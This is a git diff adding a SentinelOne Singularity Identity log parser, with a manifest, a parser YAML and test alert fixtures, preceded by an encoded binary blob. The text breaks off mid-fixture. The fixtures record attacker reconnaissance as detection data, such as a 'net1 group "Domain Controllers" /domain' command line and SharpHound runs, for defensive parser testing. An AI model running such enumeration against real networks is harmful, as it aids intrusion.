z1ild1?1J4T<&Rpuu~Zg9N($!t&)*-DY?vpK2Gd$H$TZKc!d8--vF-Yg3H1&`ZnZ>R zx>o80iK_?a=VpnCZuZ6+p*!Al7X_sbH|`3A&@-tT2zWhz+tz~iSHjcDw7E3RFj5$r zP!(P_lac#Yrgmu`-&>_~zE{rj9XugAnkdSNXJ*-%3@lCktTq2*tQ(T&$2RCPdL@I2 z`55lTj50pQpbM1xA=yP6efsBA2&gj=#=-mt#2#U)lRM2Y`I}eI*BbL&K(|-evY>sA3ok+|Rf!RIku2Wwq_a_kg)s zo?K5zwi*rbl^D;g0iVtU?czOyGqXGgWlo=p8}LIgRtbG!Ki_E{-%8(diIm8hTM~qv z$oHRgOg^c|vM(--HUwrk^sRbkW@3vZ4_eq8KG=yh0?m>2qb+Z>la)um5%UKh1DNle za}WLd_o?Rx_Z8NSseS&#l>GWwbCbA2CiME>kruKBjNthx!e?x^4anH!^jhc3A0+^r zFEI>SnAY^+eq$mATY#4$Z#kt!MZz|!*y(0aPOcvQQdsyz7u;Dpg#{w1yq(XN4V^I@ z-#Z2wg88!EZY2#>%H~S>uCzn<{``usED#u-p>~o|ErboE3d}$>{ZF++x}( zzvuVfH!lUJjlrmCxhc86?wBV)$>ooAZC;$#tDg3{Y{xm%WV-nUc{(+t^7=eA@rUhC zVLKX&;(io+@PD1_f!=pJw-5jJY7|IHY-N<92;X=VC_z0q_a=c~OMl_%fzOPpkcb+X z2j4J2-yJd`O+amd_gW&aYYsA>eoe`WCZqGVHZ(L0-)$LOuZQ00Sx$QtHKX-RS7N<1 zR5tBxS7B}bWW6gO_Y;JpguZ_rXY5pP)H3FmG(c*;l`Ngy#ud)RsL2{SQ$;;VVwQz? z7mn*!tjNyQ6-bc$Lyfp`cS}qD`4mw^+aNeUD#+rKw_&#w|8=9;kDwA_#vT@Tjpb>) zRLmE1nfsk4MS;B18gb)sef%EL57FfvvI9S1BklDlWE?n<;4=RvA8z}FG_{P*?LY*~ z=R7bzKCXvwP5f}uI6=is)rjy>m#o~GQN5u6&u0kZ<{iJ{^Rl9+7-Ig$gF&@4tbAvW8%*B!O6J*?B=du;hcM&I3K_Ff|w;swd_8}=b?1&JqhkjaY_aS z^b5LqqpZl%_ep#s+KzsH=k4S($7FJSO!Srxoe(Tl>dLq?DMBK#M%#FM>l84ae2xW6 zp_m)~l(5D3Ce^=mxYQm*1XV(krt0m+_#@%3t$#VI9cCfDz`n76gP8ppik*H+K zZT{&e1F;ZF_OQj%royE^r%gQn(F^jhxzku}uleB^)h81=o&&abH#avU3k#nBhUrTO ztyS2pvm#JhTbCz4VMDnze%uxJU?$njgD!n?m*T!!wo5Kext(#s>Q?|$LOc)9-~2$J zl5x0h_K73HbY^??{QYxo_^lX@w(n#A3o*$=Q{nc|sU>|rEnYev#!e3=lJY!1$jI!d zp!ESG4yBEh&LqC_uN0To_Uup37b#XFmgr8{JH;_VFSlct|NKHsuPAEc-jpYEv5n=Z zm!{Zt944C6-y?_n zLJfAMj6jeh2xocL#OAui?^hwkSLcM&Pvzp?^hTlMVpNS`7hCzse!qkr$cuGf`y~+XjoRjjqn#-C)99m z8M3AqQI)TC(M*bcSxhz+jw0W>M*`hO0s(=gJsw{lxUpm6r^ZHL+V2)oi1Ek==*ZtCmP7Vx%voClFzk>~;A@zp-8k&1Vm7bVp zwtAyNyID-Z7P&RtoR6*0p@kx)?1un@1=cHPl2>q==-zK`i(~U;tGYj*EN7-((^y_| zsbd_@yOIPm^LEkq3trq4l#(*>?k82Ysj9k8J`F+MfSI+y5HOy8>2}sOBWMA%W`7L0 z+Y|&pKNALOBKjSQ6%zqvYFX4%=D|19@{YAJzpHH+x_V$>U?v_M2O2N!M`f%{ijTGz zL3Ot^kX?aIklgxA3Z2zZB%K;DsKPP8F|)oOMidL_y!A2~snMOan0^Elb#tAH=-UMc z0&xG~p~uwW@aso(9K4r60sCA)k(DPbs?6%vR*ZIu?xoijY|B5wn7ntsZ$zNl_r0=V?h4HC~F`m!%3q8|bd3n=qBX`B$Jhn8o$WOF*-NU9&WkpEwzQPvY_8N*( zG2y+S!&SrJ^#(8NVFXn=0Gc6rclk#&S(D3by(4aL5Qldn^?Hmp^&P9Z8t2{m_a^s` z{5y_D6%V8V<{V8(m%+lX=snpyaJ}HIGD)lRs zYCmnc`j`?*7N0>w&39cjqfYA+Jj=f;-kjbwt4F)C^$^rGwQUW}iF4t`nS!$qfbk#- zOU}`jD2Xsl38qd{JzBPn4(9mZqS4hE+|-KPM5K(a6Gg*gty`68OvmQ6KkUdMJif6E z#EaQ?YPp#K=IQWTBnj&N@-8TaNlT{NbFJtFDgS-F#5)rs`u_Cn?y7k1HR>;X?lWn7 zT2Zo(dt4UWUxX-?dTp4`x@z2eHnopejC8XNqn#7)*f~d=ZXbO}4|_1}lBhaB2D$2z zl}!7YT%pw2g6}=1$wLVXg~@~(KXIgHnII~;slp0;{UMsh~K&-`Vej(cb#qwE+PP#&bs zb1}b#>3~R<#OJp(Y2%0$@=^X4yv`rHLg^v{UT|}8`WCOf<&5V)4_>>~a~dPBb5d08 zY9VmO^y776a)PQy!RXt<%>XWv zdgbi>;Rg=^`$AGEOWl)BjUmR4R{BQ}qr2R1E&{19x^lnL0zE*dL9bQ9iSCtuAHc|T z20?Y#ZHeE1b-5z|?(9_N+a|BfY^2?i6WPKohFDVE-d{40v1SCl=>YAc?KZv#pzSgT0+TKY(#tiSCHSsFfDQhGSeCZ(!cVUPD zmxGLr%*N>7snNu;p8Y`31bv_hdsmSdjJ!z#c01iDdi$3N6)lu5?^l$4F_RqnYb0uA z)8eDncvVFpwFA>DIR4BjjH{D1VS57Q#`)OT5+UcrNo+`7Vm~pX#i1+vlI?;V;o4z{ zNX34A+U*oAcYzuH$6R2kAd-1%(NH(B*RzlX7%1Wse~HhKJ`y35dP2UG&!*}>X3`V< zn^{7_LZrrmylfZc?v%6>*#-UNb`vV4=2PGZnt25KtxV8}Q?rn9Vj^(vUC9pmWjoZA z&~9K>?i5CiLwUKj98+wL(>$w#`v{8jlJIE>#dV4qg5f|!- z?!bG!&&gB$YWAc9eDs8uEzI0=$|TVJ$^fy)4na4d6$%7CDm~X*w=Y%exbxyy9-WRb zgT>2leLtbD4o@`rCaTq7P0syyx6ht7Jv*4vS&f?}MIN6h&98aA>RVu-!^hUTHCCdD zx=DCyyd!2#i}?0M1O@9%6^6~Nr^ZezUP*sm`h4TN?pvwnG?Wp%Lr!d{k(rY-pGM}@ zk6%L0`*4LCiFPhuU#xL0;!Acl(+UT7p)^DP$NuP?LREvG6>k ze}?s8{KPH?^$>J#xWs%BE{f1zfMD+qc+yRZ(8!)$T#{#4LDFbuh73%Z$yY8oXs&_KH@IPhIh zdw`j#4rlAV+$Xg(e_GdWf-aVXvfe(X{QB2wi2ENLaHcdUF0V&-hdI!KE5jU z69wuV9TahcS1W1n4P0mI*ZD{QXmz2tj4yFBfTd}=2h!dmk{VOve11dsj7T;+e{qp< zWG$A6ct)aIRsoebxaj9HpWb4P?o#KRpXO#me{j)XX;4x_z#H{< zY<&2t=erEe>v@7I-`(lOnYc=`%XxFy8Oz!AuCQLw2<$oBPaF*PTiq=6q=@y*CwJ`Osqa6D`9Bb`1XbFAxvl z{@njYK;y;q(h3|Q5$*#1H9ygH`$4m*oDS(MCpt%Hm3EzM0=ZRI~$3JWWe#{G{8D>t^9mm7Udcl=A zlbX3nKEO?lP7+>yJq&+2^Gc9$P#CYHaB=^|i!nz(<2Pr)JdBx8NkI`>i}+>FrA%lN zYQR0yyPjz&3R+1Xd7`8gn=-P&oosr=2zpIky{8~aocA^|x~pQ}@A4*tv$I6h=o+df zlp3ro@j29*bMDjIr;qQZ&ftFxTuEp?cQK+2YYx+xIN_&$>-qc++h$-sv>Jmo-vhTp zXcPP0D)s{Omu;n;G|}3>!e|HQ!>z`yOSg(ayQ?g>{}NY^#JyUtH$TF9AlRkHV(`@~ zi6Ln~ppPxOgov_nYH~cdaI|OaKrEGz@;mqiwX>oTej$P8R~%CtWY_VL0!0Mz73H~J z!+9T4)s&T#v$JU{Vbd453uHTU$dAU;e8Z_b*&%9&EE?|I{=EQrXO!m<6FKd~A3ZH9 z{b7pgjYsG@nD{vQKeMURK@%=D*8U*eATW4W1?Mqn&y4_6$dcibbbA7+-C&7iYuC!P7 zx8dgAZ*1WH*1&KUh;N;Ojp@WmXvlVHM$`VwV<~qLG1Q?jXmB0hreXHkn0=b^*|{Hc z80FjNBNsvpo$e$#_1ub>)nW7xe)97t14*68H0!qSm!rVNm}dN1$o^z@oI~l@wUM&I zDJ(1;=3vhVNn2{zoVjcINpFt<& zFEOF7fYTul#(_YV2GrE-+vc>D0?MLdz|w1ZwsNh&A^5!Ko?Z|3gC1|cb~41o40HaU zOi5#?(_BIqk$YapBikmKrCyfZsRi)9uHKezNLUU8$RFnoT~DeeOTVqE3vHOcyY_JZ zUbv$pNPlFsHB5`6pEnqLWyIQ-n~ z(~hJP_QuG~04-It)@|Feg1uvbr|C-)m?fOt=1(30!Dgv!!Y{^dBNwC{>%vlb< z=z^niGIP*ZSUN(UHAT7P!O~3NR2c-Y{x8{%*SWnuA$-T=pzeOR6ve7OIDiliS?HUlH}tC-BqPk?zCQ(&vJ9{Bf9 zMORmsQw!iRq+W^o4gUs~ru3L3B2t6JACZ1V+FN@@jT}_u5@=0P^*8XJ&kmB-p{7n& z3mkH9{eD>oLY#5%+}E)#qu?i;xp>a+Pk5s3+1sB*i6ZGeV_jd zIS6*<6a2JOWHS!5_tWM^8EM5}xJIRGR=;gEv+uDI&v{=2q_HcO zl#T(odO$OXnl^hGGO(`^hCLC!Ve~608}+h2AOPCF9XCl?S&Eqcr0lO94SfHuIlAs8OH$jq zQdV%)W!@UP1{0;kqXRjF55y<3@CA{uZN@D#ebr9s)HYWug3bw{9lX80!w&6*=#haa z$ucM~TlHBv9FHH>Yd-?;deuQ(-tWaaT734!w`A^;QRdHmQ^M@++a zM5Y|kRyDLAj1B{K2>XP=;*5X_OR9jUtjUCQS_J$57Qo0c4K4f7i5OE~1wi!av9UVl zU0rTJ@jhWN6?>HC`q1y=i3UKgILuuLxK*<$1?{~p$@fb$^VB%^AAR|~TRhR15_~oZ z)P@=}kA%A?woiKjzjaL2J5F(}hVyf!JY8TYa7?Rm{s)hnxqmRyQ8WYJZeee55}rRp zMJeT@KrcFjt_C9J=znMX&ajinA%EbChekK+Imv395quCXWOD9OdmDUL^wW^dO~tr- zQxIw{!Zw%K)b@U9(U}<$`hukxW{!DFkTC@56v-QE^i}fa+#BAz%Kvl7&nW69Zq?gg z?{?{X^HULMrX)l~r;i?*1IXQySr1mxA#zs_At@yE-jG+n!xW58AF^REL9*s)qLslv zycCESJXvq0v(#^%zZCq{6h3g$VIP#AQAuTjTe!fbE63_bM%<|dbzk6;;|Ix#&>54G zllP-LqC5X%X?_2rU^3bZ0C()Mqy#WN33O$p68WP1VqqIv*0TL|i0E6QM6I!YD25Wa z1oGt=NVD>0f?KZe@0Ff6kjrI1^zCP;+D=rlax!lK2F`6V(;4jI!kh8-=@P(Gm(2z2 zttlK|mt%^J4)n*euDAe2_*Ci zTWyg&m%{jsotU+UV9#}p7cYRLG6Z0eP@JEKh^Q_b^|*|SU_kf?Jw5j&(#9f&l)c?= z|LV`$+8W;*%HS!6hU)nN7UqZF{<15FHU?qxWAO)HcE}UN9(R;%hN!S=ImuHSmyPG} z9d@7QpWc`;p;-238#V=o;^R;H#AnXi_~0tGHQwuD9ha8@EzhLs5pT;UleIV=xKj!C zQ&tzG}7-uci+D`bDOo?rG^jf*;39$KsW0 z{%n;T*y2aDgSlyNI>1sRfQVDL0ofd@=X60W-BMbF;FC#!Bvg&_m%91by4N!a(7RBd zeu~UX6C;#=Ujn`oph6w$hZjWdqp1A zl`j>IOS+pULa#gxRSv8|9Xs>6?>U=gs6Ulud;d({D>^?-7syFRm;k7A%8zw7D3g8p zs<=$}d=;`G+Vx{xF1`gkF1G^4`6{K&JONCry;$jF-pKQL`|WI;T)S$`4%~JgLH<{Q ze`QyxP`@zA^r-p091?p3n3pVlgXaNiNz5+#nt|{%`mkKLCeZ&2MJX8h0c|)w9m3ahh3oy({*Qgz($4swK~wmJsxdF zjngNUb}g4(>|9nY<>3@c+tAEp`#3M0Hxz8vAWjaGHTLX%)CiyTBk0zq#!Hu*KbLBZ z&Mq4j+f`DIpv}#(v$N}x+%Io_G&pZEz;|v%WU0M3;#6!r6{7`2ZImsdspYS>&a&0) zC+Oe$J*kAvfN0m5RK;?0B6r(3fp~|s2wkGIE*Q_o|QK+%EEWFQ*W^Uf4qjl&F=pgV=7nGKKv z;X495H7mb9p(=J{%O)KyJ&+C-1XXbuENWr9{C3WcUK6|(`)gy?{ca~m?cYU!-fQ^Z z?$Pg{JsYSBS=51q(0+#|*QvEb?+Y6)@U<-C+CiOgUZ?_Kc2yopKjM~rrO5dgR?4a% z*8JC>Jf1)6v5A`QGwKQKgqVi?HP$Jdgv&!Z9h?2UX}Y~N+OJpiUoCecYJR|Ir=;C$T?WFSWTsaWNfZx2;rOU`j53yUT4*k5 zVeb&hb1pWGkQA6xL(Oi&e@RaCdU?Ui_7|vkh3@)WKI@|Y8%2sEwX?T3mWhGExVvl! zq$~^quQVlrzSdc7b(iu_!J9MeU0i~kyPhIiUFk4HcDLmKN=H|3Zfcl`GAl%rg=hb$ z;hW({-~Q2*4Z*MvB)bxyz5;b^#qALt_wIaDy{y=I48{?MXAr)5k*`^V zTeO@S+iqJ^QAJsjQoSNw-kqKsvlGf<9KSgxnP ziZ&Giyvs%?D@ourkOn~~UF&d=@bKspgvT*}7fCHLFakBCHve&ef*bdo_wy9iY^Y`- z`-Zdw?Xwp+dcFCw+OZi%>ro<)uS)HT;8?sqpoYpvhTY!yM2d!LD;)5%#e#iRW;6;- zb3hA!u{Yk2q}FIpq%bD$OxU^~)84@Ym!Hx+rOcraN&*5SvgEEe#>|Y2?XkOUz@pW~ zyQZx@#hI)9y~LIw&%J?-+!lyi3Gcfwf`B4L3$`=F=2fw@`-}}`?#NfM{)mxLvfp>H z0VGA$&8}#ZCrI2Bo&N@mi-s+Ig^7*+{2APA{jqdCu2iQ|kV=Jy&OS-Tf-rn!-75ceuVY)J@af{xO~L z^=e(%2ZDNG68?wFm~UeE@4x`5u0c*g0VrCIY!8%&f)v5bRI}7Ee+xbcqJTKm*+JIJ zo|6t?@RRQ8BR#IJ- + SentinelOne Singularity Identity is a cybersecurity solution that provides identity protection and zero-trust security by continuously monitoring and analyzing user behaviors to detect and prevent potential threats. + +data_sources: diff --git a/SentinelOne/identity/_meta/smart-descriptions.json b/SentinelOne/identity/_meta/smart-descriptions.json new file mode 100644 index 000000000..ad570cb92 --- /dev/null +++ b/SentinelOne/identity/_meta/smart-descriptions.json @@ -0,0 +1,46 @@ +[ + { + "value": "Alert defined {sentinelone.identity.name} with status {sentinelone.identity.status} on {process.command_line}", + "conditions": [ + { + "field": "sentinelone.identity.name" + }, + { + "field": "sentinelone.identity.status" + }, + { + "field": "process.command_line" + } + ] + }, + { + "value": "Alert defined {sentinelone.identity.name} with status {sentinelone.identity.status}", + "conditions": [ + { + "field": "sentinelone.identity.name" + }, + { + "field": "sentinelone.identity.status" + } + ] + }, + { + "value": "Alert defined {sentinelone.identity.name} on {process.command_line}", + "conditions": [ + { + "field": "sentinelone.identity.name" + }, + { + "field": "process.command_line" + } + ] + }, + { + "value": "Alert defined {sentinelone.identity.name}", + "conditions": [ + { + "field": "sentinelone.identity.name" + } + ] + } +] \ No newline at end of file diff --git a/SentinelOne/identity/ingest/parser.yml b/SentinelOne/identity/ingest/parser.yml new file mode 100644 index 000000000..507745cb7 --- /dev/null +++ b/SentinelOne/identity/ingest/parser.yml @@ -0,0 +1,67 @@ +name: identity +pipeline: + - name: json_event + external: + name: json.parse-json + properties: + input_field: "{{original.message}}" + + - name: detected_at + filter: "{{json_event.message.detectedAt != null}}" + external: + name: date.parse + properties: + input_field: "{{json_event.message.detectedAt}}" + output_field: timestamp + + - name: started_at + filter: "{{json_event.message.firstSeenAt != null}}" + external: + name: date.parse + properties: + input_field: "{{json_event.message.firstSeenAt}}" + output_field: timestamp + + - name: last_seen_at + filter: "{{json_event.message.lastSeenAt != null}}" + external: + name: date.parse + properties: + input_field: "{{json_event.message.lastSeenAt}}" + output_field: timestamp + + - name: set_meta_fields +stages: + set_meta_fields: + actions: + - set: + event.kind: "alert" + event.category: "intrusion_detection" + event.type: "info" + observer.vendor: "SentinelOne" + observer.product: "Singularity Identity" + + "@timestamp": "{{detected_at.timestamp}}" + event.start: "{{started_at.timestamp}}" + event.end: "{{last_seen_at.timestamp}}" + + event.provider: "{{json_event.message.detectionSource.product}}" + event.reason: "{{json_event.message.description}}" + + process.command_line: "{{json_event.message.process.cmdLine}}" + process.parent.name: "{{json_event.message.process.parentName}}" + + file.path: "{{json_event.message.process.file.path}}" + file.name: "{{json_event.message.process.file.path | basename}}" + file.hash.sha1: "{{json_event.message.process.file.sha1}}" + file.hash.sha256: "{{json_event.message.process.file.sha256}}" + file.hash.md5: "{{json_event.message.process.file.md5}}" + + sentinelone.identity.id: "{{json_event.message.id}}" + sentinelone.identity.name: "{{json_event.message.name}}" + sentinelone.identity.attackSurfaces: "{{json_event.message.attackSurfaces}}" + sentinelone.identity.status: "{{json_event.message.status}}" + sentinelone.identity.classification: "{{json_event.message.classification}}" + sentinelone.identity.confidenceLevel: "{{json_event.message.confidenceLevel}}" + sentinelone.identity.result: "{{json_event.message.result}}" + sentinelone.identity.storyLineId: "{{json_event.message.storyLineId}}" \ No newline at end of file diff --git a/SentinelOne/identity/tests/test_alert_1.json b/SentinelOne/identity/tests/test_alert_1.json new file mode 100644 index 000000000..1e8b5bf2b --- /dev/null +++ b/SentinelOne/identity/tests/test_alert_1.json @@ -0,0 +1,49 @@ +{ + "input": { + "message": "{\n \"id\": \"ba485919-e4c1-4496-9e2f-feb320f6841a\",\n \"name\": \"Domain Controller Discovery Detected\",\n \"description\": \"This event is raised when there is a query from an endpoint to find the domain controllers or AD Servers in the Active Directory Domain.\",\n \"detectedAt\": \"2024-11-22T05:35:09.000Z\",\n \"attackSurfaces\": [\n \"IDENTITY\"\n ],\n \"detectionSource\": {\n \"product\": \"Identity\"\n },\n \"status\": \"NEW\",\n \"assignee\": null,\n \"classification\": \"ENUMERATION\",\n \"confidenceLevel\": \"MALICIOUS\",\n \"firstSeenAt\": \"2024-11-22T05:35:09.000Z\",\n \"lastSeenAt\": \"2024-11-22T05:35:09.000Z\",\n \"process\": {\n \"cmdLine\": \"C:\\\\Windows\\\\system32\\\\net1 group \\\"Domain Controllers\\\" /domain\",\n \"file\": {\n \"path\": \"c:\\\\windows\\\\system32\\\\net1.exe\",\n \"sha1\": null,\n \"sha256\": \"18F76BC1F02A161EBDEDF3142273C186D05A836ADDCAAEE599194089FD59F398\",\n \"md5\": null\n },\n \"parentName\": null\n },\n \"result\": null,\n \"storylineId\": null\n}" + }, + "expected": { + "message": "{\n \"id\": \"ba485919-e4c1-4496-9e2f-feb320f6841a\",\n \"name\": \"Domain Controller Discovery Detected\",\n \"description\": \"This event is raised when there is a query from an endpoint to find the domain controllers or AD Servers in the Active Directory Domain.\",\n \"detectedAt\": \"2024-11-22T05:35:09.000Z\",\n \"attackSurfaces\": [\n \"IDENTITY\"\n ],\n \"detectionSource\": {\n \"product\": \"Identity\"\n },\n \"status\": \"NEW\",\n \"assignee\": null,\n \"classification\": \"ENUMERATION\",\n \"confidenceLevel\": \"MALICIOUS\",\n \"firstSeenAt\": \"2024-11-22T05:35:09.000Z\",\n \"lastSeenAt\": \"2024-11-22T05:35:09.000Z\",\n \"process\": {\n \"cmdLine\": \"C:\\\\Windows\\\\system32\\\\net1 group \\\"Domain Controllers\\\" /domain\",\n \"file\": {\n \"path\": \"c:\\\\windows\\\\system32\\\\net1.exe\",\n \"sha1\": null,\n \"sha256\": \"18F76BC1F02A161EBDEDF3142273C186D05A836ADDCAAEE599194089FD59F398\",\n \"md5\": null\n },\n \"parentName\": null\n },\n \"result\": null,\n \"storylineId\": null\n}", + "event": { + "category": "intrusion_detection", + "end": "2024-11-22T05:35:09Z", + "kind": "alert", + "provider": "Identity", + "reason": "This event is raised when there is a query from an endpoint to find the domain controllers or AD Servers in the Active Directory Domain.", + "start": "2024-11-22T05:35:09Z", + "type": "info" + }, + "@timestamp": "2024-11-22T05:35:09Z", + "file": { + "hash": { + "sha256": "18F76BC1F02A161EBDEDF3142273C186D05A836ADDCAAEE599194089FD59F398" + }, + "name": "net1.exe", + "path": "c:\\windows\\system32\\net1.exe" + }, + "observer": { + "product": "Singularity Identity", + "vendor": "SentinelOne" + }, + "process": { + "command_line": "C:\\Windows\\system32\\net1 group \"Domain Controllers\" /domain" + }, + "related": { + "hash": [ + "18F76BC1F02A161EBDEDF3142273C186D05A836ADDCAAEE599194089FD59F398" + ] + }, + "sentinelone": { + "identity": { + "attackSurfaces": [ + "IDENTITY" + ], + "classification": "ENUMERATION", + "confidenceLevel": "MALICIOUS", + "id": "ba485919-e4c1-4496-9e2f-feb320f6841a", + "name": "Domain Controller Discovery Detected", + "status": "NEW" + } + } + } +} \ No newline at end of file diff --git a/SentinelOne/identity/tests/test_alert_10.json b/SentinelOne/identity/tests/test_alert_10.json new file mode 100644 index 000000000..deb56e2a5 --- /dev/null +++ b/SentinelOne/identity/tests/test_alert_10.json @@ -0,0 +1,34 @@ +{ + "input": { + "message": "{\"id\": \"01935322-7b49-71f0-89e0-f52562c26e53\", \"name\": \"Brute force attack - Mass Account Lockout\", \"description\": \"This event is raised when ADAssessor detects lockout of multiple accounts, which could be due to brute-force attempts or a password spray.\", \"detectedAt\": \"2024-11-22T09:09:48.731Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"UNKNOWN\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T09:09:48.731Z\", \"lastSeenAt\": \"2024-11-22T09:09:48.731Z\", \"process\": null, \"result\": null, \"storylineId\": null}" + }, + "expected": { + "message": "{\"id\": \"01935322-7b49-71f0-89e0-f52562c26e53\", \"name\": \"Brute force attack - Mass Account Lockout\", \"description\": \"This event is raised when ADAssessor detects lockout of multiple accounts, which could be due to brute-force attempts or a password spray.\", \"detectedAt\": \"2024-11-22T09:09:48.731Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"UNKNOWN\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T09:09:48.731Z\", \"lastSeenAt\": \"2024-11-22T09:09:48.731Z\", \"process\": null, \"result\": null, \"storylineId\": null}", + "event": { + "category": "intrusion_detection", + "end": "2024-11-22T09:09:48.731000Z", + "kind": "alert", + "provider": "Identity", + "reason": "This event is raised when ADAssessor detects lockout of multiple accounts, which could be due to brute-force attempts or a password spray.", + "start": "2024-11-22T09:09:48.731000Z", + "type": "info" + }, + "@timestamp": "2024-11-22T09:09:48.731000Z", + "observer": { + "product": "Singularity Identity", + "vendor": "SentinelOne" + }, + "sentinelone": { + "identity": { + "attackSurfaces": [ + "IDENTITY" + ], + "classification": "UNKNOWN", + "confidenceLevel": "MALICIOUS", + "id": "01935322-7b49-71f0-89e0-f52562c26e53", + "name": "Brute force attack - Mass Account Lockout", + "status": "NEW" + } + } + } +} \ No newline at end of file diff --git a/SentinelOne/identity/tests/test_alert_11.json b/SentinelOne/identity/tests/test_alert_11.json new file mode 100644 index 000000000..a4d81025f --- /dev/null +++ b/SentinelOne/identity/tests/test_alert_11.json @@ -0,0 +1,49 @@ +{ + "input": { + "message": "{\"id\": \"01935310-d00e-7616-81b9-fcb227ebb13d\", \"name\": \"Domain Controller Discovery Detected\", \"description\": \"This event is raised when there is a query from an endpoint to find the domain controllers or AD Servers in the Active Directory Domain.\", \"detectedAt\": \"2024-11-22T08:45:51.000Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"ENUMERATION\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T08:45:51.000Z\", \"lastSeenAt\": \"2024-11-22T08:45:51.000Z\", \"process\": {\"cmdLine\": \"Sharphound.exe\", \"file\": {\"path\": \"c:\\\\users\\\\administrator\\\\desktop\\\\ad_recon\\\\sharphound.exe\", \"sha1\": null, \"sha256\": \"61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863\", \"md5\": null}, \"parentName\": null}, \"result\": null, \"storylineId\": null}" + }, + "expected": { + "message": "{\"id\": \"01935310-d00e-7616-81b9-fcb227ebb13d\", \"name\": \"Domain Controller Discovery Detected\", \"description\": \"This event is raised when there is a query from an endpoint to find the domain controllers or AD Servers in the Active Directory Domain.\", \"detectedAt\": \"2024-11-22T08:45:51.000Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"ENUMERATION\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T08:45:51.000Z\", \"lastSeenAt\": \"2024-11-22T08:45:51.000Z\", \"process\": {\"cmdLine\": \"Sharphound.exe\", \"file\": {\"path\": \"c:\\\\users\\\\administrator\\\\desktop\\\\ad_recon\\\\sharphound.exe\", \"sha1\": null, \"sha256\": \"61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863\", \"md5\": null}, \"parentName\": null}, \"result\": null, \"storylineId\": null}", + "event": { + "category": "intrusion_detection", + "end": "2024-11-22T08:45:51Z", + "kind": "alert", + "provider": "Identity", + "reason": "This event is raised when there is a query from an endpoint to find the domain controllers or AD Servers in the Active Directory Domain.", + "start": "2024-11-22T08:45:51Z", + "type": "info" + }, + "@timestamp": "2024-11-22T08:45:51Z", + "file": { + "hash": { + "sha256": "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863" + }, + "name": "sharphound.exe", + "path": "c:\\users\\administrator\\desktop\\ad_recon\\sharphound.exe" + }, + "observer": { + "product": "Singularity Identity", + "vendor": "SentinelOne" + }, + "process": { + "command_line": "Sharphound.exe" + }, + "related": { + "hash": [ + "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863" + ] + }, + "sentinelone": { + "identity": { + "attackSurfaces": [ + "IDENTITY" + ], + "classification": "ENUMERATION", + "confidenceLevel": "MALICIOUS", + "id": "01935310-d00e-7616-81b9-fcb227ebb13d", + "name": "Domain Controller Discovery Detected", + "status": "NEW" + } + } + } +} \ No newline at end of file diff --git a/SentinelOne/identity/tests/test_alert_12.json b/SentinelOne/identity/tests/test_alert_12.json new file mode 100644 index 000000000..1618da843 --- /dev/null +++ b/SentinelOne/identity/tests/test_alert_12.json @@ -0,0 +1,49 @@ +{ + "input": { + "message": "{\"id\": \"01935310-eb28-7a57-9c27-87843b2cec61\", \"name\": \"AD Service Account Enumeration Detected\", \"description\": \"This event is generated when LDAP queries for enumerating service accounts are detected from an endpoint.\", \"detectedAt\": \"2024-11-22T08:45:51.000Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"ENUMERATION\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T08:45:51.000Z\", \"lastSeenAt\": \"2024-11-22T08:45:51.000Z\", \"process\": {\"cmdLine\": \"Sharphound.exe\", \"file\": {\"path\": \"c:\\\\users\\\\administrator\\\\desktop\\\\ad_recon\\\\sharphound.exe\", \"sha1\": null, \"sha256\": \"61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863\", \"md5\": null}, \"parentName\": null}, \"result\": null, \"storylineId\": null}" + }, + "expected": { + "message": "{\"id\": \"01935310-eb28-7a57-9c27-87843b2cec61\", \"name\": \"AD Service Account Enumeration Detected\", \"description\": \"This event is generated when LDAP queries for enumerating service accounts are detected from an endpoint.\", \"detectedAt\": \"2024-11-22T08:45:51.000Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"ENUMERATION\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T08:45:51.000Z\", \"lastSeenAt\": \"2024-11-22T08:45:51.000Z\", \"process\": {\"cmdLine\": \"Sharphound.exe\", \"file\": {\"path\": \"c:\\\\users\\\\administrator\\\\desktop\\\\ad_recon\\\\sharphound.exe\", \"sha1\": null, \"sha256\": \"61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863\", \"md5\": null}, \"parentName\": null}, \"result\": null, \"storylineId\": null}", + "event": { + "category": "intrusion_detection", + "end": "2024-11-22T08:45:51Z", + "kind": "alert", + "provider": "Identity", + "reason": "This event is generated when LDAP queries for enumerating service accounts are detected from an endpoint.", + "start": "2024-11-22T08:45:51Z", + "type": "info" + }, + "@timestamp": "2024-11-22T08:45:51Z", + "file": { + "hash": { + "sha256": "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863" + }, + "name": "sharphound.exe", + "path": "c:\\users\\administrator\\desktop\\ad_recon\\sharphound.exe" + }, + "observer": { + "product": "Singularity Identity", + "vendor": "SentinelOne" + }, + "process": { + "command_line": "Sharphound.exe" + }, + "related": { + "hash": [ + 